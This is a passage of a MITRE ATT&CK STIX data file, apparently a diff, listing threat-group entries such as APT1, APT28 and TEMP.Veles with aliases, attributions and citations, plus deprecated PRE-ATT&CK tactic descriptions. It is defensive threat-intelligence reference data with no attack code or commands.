\u201chijacked\u201d since they were originally registered for a legitimate reason but were used by APT1 for malicious purposes.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5", + "type": "relationship", + "modified": "2020-03-25T13:59:27.774Z", + "created": "2020-03-25T13:59:27.774Z" + }, + { + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "The MITRE Corporation", + "identity_class": "organization", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "identity", + "modified": "2017-06-01T00:00:00.000Z", + "created": "2017-06-01T00:00:00.000Z" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "source_name": "CrowdStrike Putter Panda" + } + ], + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "modified": "2020-10-22T18:35:55.290Z", + "created": "2017-05-31T21:31:47.955Z", + "x_mitre_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT16", + "description": "[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0023", + "external_id": "G0023" + }, + { + "source_name": "APT16", + "description": "(Citation: FireEye EPS Awakens Part 2)" + }, + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + } + ], + "aliases": [ + "APT16" + ], + "modified": "2020-10-12T19:54:58.537Z", + "created": "2017-05-31T21:31:56.270Z", + "x_mitre_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT17", + "description": "[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0025", + "external_id": "G0025" + }, + { + "source_name": "APT17", + "description": "(Citation: FireEye APT17)" + }, + { + "source_name": "Deputy Dog", + "description": "(Citation: FireEye APT17)" + }, + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "aliases": [ + "APT17", + "Deputy Dog" + ], + "modified": "2020-10-13T22:33:14.018Z", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "G0007", + "url": "https://attack.mitre.org/groups/G0007", + "source_name": "mitre-attack" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT. (Citation: FireEye APT28 January 2017) (Citation: SecureWorks TG-4127) (Citation: Kaspersky Sofacy) (Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127) (Citation: ESET Sednit Part 3)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "source_name": "Ars Technica GRU indictment Jul 2018" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "source_name": "SecureWorks TG-4127" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." + }, + { + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", + "source_name": "ESET Zebrocy May 2019" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "source_name": "Talos Seduploader Oct 2017" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018." + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." + }, + { + "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", + "source_name": "Microsoft STRONTIUM Aug 2019" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." + } + ], + "aliases": [ + "APT28", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "modified": "2020-10-06T23:32:21.793Z", + "created": "2017-05-31T21:31:48.664Z", + "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "x_mitre_version": "3.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Cleaver", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0003", + "external_id": "G0003" + }, + { + "source_name": "Cleaver", + "description": "(Citation: Cylance Cleaver)" + }, + { + "source_name": "Threat Group 2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "TG-2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "aliases": [ + "Cleaver", + "Threat Group 2889", + "TG-2889" + ], + "modified": "2020-10-15T16:59:26.732Z", + "created": "2017-05-31T21:31:46.390Z", + "x_mitre_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0014", + "external_id": "G0014" + }, + { + "source_name": "Night Dragon", + "description": "(Citation: McAfee Night Dragon)" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "aliases": [ + "Night Dragon" + ], + "modified": "2020-10-15T00:54:00.656Z", + "created": "2017-05-31T21:31:51.643Z", + "x_mitre_version": "1.3" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://attack.mitre.org/groups/G0088", + "source_name": "mitre-attack", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON.(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )" + }, + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + }, + { + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "source_name": "FireEye TEMP.Veles 2018" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019." + }, + { + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/", + "source_name": "Dragos Xenotime 2018" + }, + { + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", + "source_name": "Pylos Xenotime 2019" + }, + { + "source_name": "FireEye TEMP.Veles 2018 ", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019." + } + ], + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "modified": "2020-10-04T23:31:36.937Z", + "created": "2019-04-16T15:14:38.533Z", + "x_mitre_version": "1.2" + }, + { + "id": "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Adversary OPSEC", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0021/).\n\nAdversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. The adversary may use these techniques to evade defenses, reduce attribution, minimize discovery, and/or increase the time and effort required to analyze.", + "external_references": [ + { + "external_id": "TA0021", + "url": "https://attack.mitre.org/tactics/TA0021", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "adversary-opsec", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:37.579Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0024/).\n\nBuilding capabilities consists of developing and/or acquiring the software, data and techniques used at different phases of an operation. This is the process of identifying development requirements and implementing solutions such as malware, delivery mechanisms, obfuscation/cryptographic protections, and call back and O&M functions.", + "external_references": [ + { + "external_id": "TA0024", + "url": "https://attack.mitre.org/tactics/TA0024", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "build-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:02.517Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Establish & Maintain Infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0022/).\n\nEstablishing and maintaining infrastructure consists of building, purchasing, co-opting, and maintaining systems and services used to conduct cyber operations. An adversary will need to establish infrastructure used to communicate with and control assets used throughout the course of their operations.", + "external_references": [ + { + "external_id": "TA0022", + "url": "https://attack.mitre.org/tactics/TA0022", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "establish-&-maintain-infrastructure", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:16.235Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0017/).\n\nOrganizational information gathering consists of the process of identifying critical organizational elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Similar to competitive intelligence, organizational intelligence gathering focuses on understanding the operational tempo of an organization and gathering a deep understanding of the organization and how it operates, in order to best develop a strategy to target it.", + "external_references": [ + { + "external_id": "TA0017", + "url": "https://attack.mitre.org/tactics/TA0017", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:54.996Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0020/).\n\nOrganizational weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target organizations of interest.", + "external_references": [ + { + "external_id": "TA0020", + "url": "https://attack.mitre.org/tactics/TA0020", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:16.863Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0016/).\n\nPeople Information Gathering consists of the process of identifying critical personnel elements of intelligence an adversary will need about a target in order to best attack.\u00a0 People intelligence gathering focuses on identifying key personnel or individuals with critical accesses in order to best approach a target for attack.\u00a0 It may involve aspects of social engineering, elicitation, mining social media sources, or be thought of as understanding the personnel element of competitive intelligence.", + "external_references": [ + { + "external_id": "TA0016", + "url": "https://attack.mitre.org/tactics/TA0016", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:26.736Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0019/).\n\nPeople weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target persons of interest or social trust relationships.", + "external_references": [ + { + "external_id": "TA0019", + "url": "https://attack.mitre.org/tactics/TA0019", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:52.355Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Persona Development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0023/).\n\nPersona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.", + "external_references": [ + { + "external_id": "TA0023", + "url": "https://attack.mitre.org/tactics/TA0023", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "persona-development", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:42.444Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Direction", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0013/).\n\nPriority definition direction consists of the process of collecting and assigning requirements for meeting 